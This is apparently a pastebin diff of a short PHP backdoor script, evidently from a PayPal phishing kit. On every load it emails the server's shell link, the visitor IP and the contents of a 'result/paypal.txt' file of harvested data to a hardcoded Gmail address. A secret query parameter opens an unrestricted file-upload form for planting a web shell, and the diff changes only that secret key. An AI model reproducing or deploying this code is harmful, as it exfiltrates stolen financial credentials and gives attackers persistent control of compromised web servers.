SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | $ss = $_SERVER['REMOTE_ADDR']; | |
3 | $to .= 'havij.exe@gmail.com'; | |
4 | $subject = 'PPL LOGIN FROM | '.$ss.''; | |
5 | - | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?uba=dexter"."\r\n\n"."_________________________________". file_get_contents("result/paypal.txt") . "\n"; |
5 | + | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?wlad=l9hab"."\r\n\n"."_________________________________". file_get_contents("result/paypal.txt") . "\n"; |
6 | $headers = 'MIME-Version: 1.0' . "\r\n"; | |
7 | $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; | |
8 | $headers .= 'From: Dexter <localhost>' . "\r\n"; | |
9 | mail($to, $subject, $message, $headers); | |
10 | ||
11 | $nemo = $_GET['wlad']; | |
12 | if($nemo == 'l9hab'){ | |
13 | $nemoshell = $_FILES['file']['name']; | |
14 | $nemohero = $_FILES['file']['tmp_name']; | |
15 | echo "<form method='POST' enctype='multipart/form-data'> | |
16 | <input type='file'name='file' /> | |
17 | <input type='submit' value='upload shell' /> | |
18 | </form>"; | |
19 | move_uploaded_file($nemohero,$nemoshell); | |
20 | } | |
21 | ||
22 | ||
23 | ?> |